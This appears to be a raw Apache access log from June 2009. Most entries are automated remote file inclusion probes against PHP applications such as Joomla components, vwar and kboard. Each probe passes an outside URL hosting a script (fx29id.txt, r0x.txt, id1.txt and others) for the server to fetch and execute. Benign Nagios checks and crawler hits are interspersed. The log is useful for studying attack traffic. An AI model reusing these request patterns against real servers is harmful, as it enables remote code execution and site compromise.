151.1.154.24 - - [21/Jun/2009:06:58:56 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:58:56 -0400] "GET /logs/access_log.Q109061100%20%20/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:59:00 -0400] "GET /logs/access_log.Q109053000/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:59:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [21/Jun/2009:07:02:28 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:07:02:28 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:07:02:28 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:07:02:37 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:07:04:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [21/Jun/2009:07:08:44 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:07:08:46 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:07:09:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [21/Jun/2009:07:11:12 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:07:12:19 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
68.109.233.157 - - [21/Jun/2009:07:12:49 -0400] "GET /logs/access_log.Q109061100//admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
66.249.71.54 - - [21/Jun/2009:07:13:18 -0400] "GET /images/over-index9_irrihand.jpg HTTP/1.1" 200 1962 "-" "Googlebot-Image/1.0"
66.249.71.14 - - [21/Jun/2009:07:13:18 -0400] "GET /images/5096000_thumb.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
89.108.67.172 - - [21/Jun/2009:07:13:19 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.812"
89.108.67.172 - - [21/Jun/2009:07:13:19 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.812"
89.108.67.172 - - [21/Jun/2009:07:13:21 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.812"
69.64.89.139 - - [21/Jun/2009:07:13:29 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:13:29 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:13:29 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:36 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:37 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:39 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:39 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:41 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:41 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:41 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:43 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:13:45 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:14:00 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:14:00 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:14:00 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:07:14:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.112.152 - - [21/Jun/2009:07:14:21 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/id2.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
91.121.112.152 - - [21/Jun/2009:07:14:21 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/id2.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
91.121.112.152 - - [21/Jun/2009:07:14:21 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/id2.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
204.11.17.16 - - [21/Jun/2009:07:14:23 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/tanii??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
70.86.8.66 - - [21/Jun/2009:07:14:25 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:25 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:25 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:35 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.112.152 - - [21/Jun/2009:07:14:39 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/id2.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
70.86.8.66 - - [21/Jun/2009:07:14:40 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:40 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:46 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:47 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:47 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:47 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:48 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:50 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:50 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:50 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:14:52 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
190.144.44.36 - - [21/Jun/2009:07:14:54 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [21/Jun/2009:07:14:54 -0400] "GET /logs/?sourcedir=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
190.144.44.36 - - [21/Jun/2009:07:14:54 -0400] "GET /?sourcedir=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
190.144.44.36 - - [21/Jun/2009:07:15:04 -0400] "GET /logs/access_log.Q109061000/?sourcedir=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:15:22 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:15:24 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.108.67.172 - - [21/Jun/2009:07:15:56 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.812"
74.6.17.151 - - [21/Jun/2009:07:16:00 -0400] "GET /images/ACE_Fall04_BestBuys.pdf HTTP/1.0" 200 5886198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.64.89.139 - - [21/Jun/2009:07:16:48 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.6.17.151 - - [21/Jun/2009:07:16:35 -0400] "GET /logs/access_log.Q109052500 HTTP/1.0" 200 2746180 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.86.8.66 - - [21/Jun/2009:07:17:15 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:17:19 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.86.8.66 - - [21/Jun/2009:07:17:28 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:18:10 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:18:10 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:18:10 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:18:30 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:07:19:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.40.150.211 - - [21/Jun/2009:07:19:27 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.40.150.211 - - [21/Jun/2009:07:19:27 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.40.150.211 - - [21/Jun/2009:07:19:27 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
64.40.150.211 - - [21/Jun/2009:07:19:31 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.40.150.211 - - [21/Jun/2009:07:19:31 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.40.150.211 - - [21/Jun/2009:07:19:31 -0400] "GET /logs/access_log.Q109060400%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
190.144.44.36 - - [21/Jun/2009:07:19:33 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [21/Jun/2009:07:19:42 -0400] "GET /logs/access_log.Q109061000%20%20/?sourcedir=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:07:20:47 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:07:20:47 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:07:20:48 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
64.40.150.211 - - [21/Jun/2009:07:21:06 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
64.40.150.211 - - [21/Jun/2009:07:21:06 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.40.150.211 - - [21/Jun/2009:07:21:06 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:21:42 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:21:42 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:21:42 -0400] "GET /logs/access_log.Q109060400%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:21:58 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
190.144.44.36 - - [21/Jun/2009:07:21:59 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:07:22:07 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
200.54.154.10 - - [21/Jun/2009:07:22:09 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:22:13 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:22:27 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:22:27 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:22:27 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:07:22:56 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:07:22:56 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:07:22:56 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:23:12 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:23:12 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:23:15 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:23:40 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:23:40 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:23:40 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:07:24:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.149.157.130 - - [21/Jun/2009:07:24:16 -0400] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:07:24:16 -0400] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:07:24:16 -0400] "GET /logs/access_log.Q109060400//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:24:27 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:24:27 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:24:28 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:07:24:31 -0400] "GET /logs/access_log.Q109061000/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:07:25:14 -0400] "GET /logs/access_log.Q109060400%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:25:22 -0400] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:25:22 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:25:24 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:25:24 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:25:49 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.54.154.10 - - [21/Jun/2009:07:25:50 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
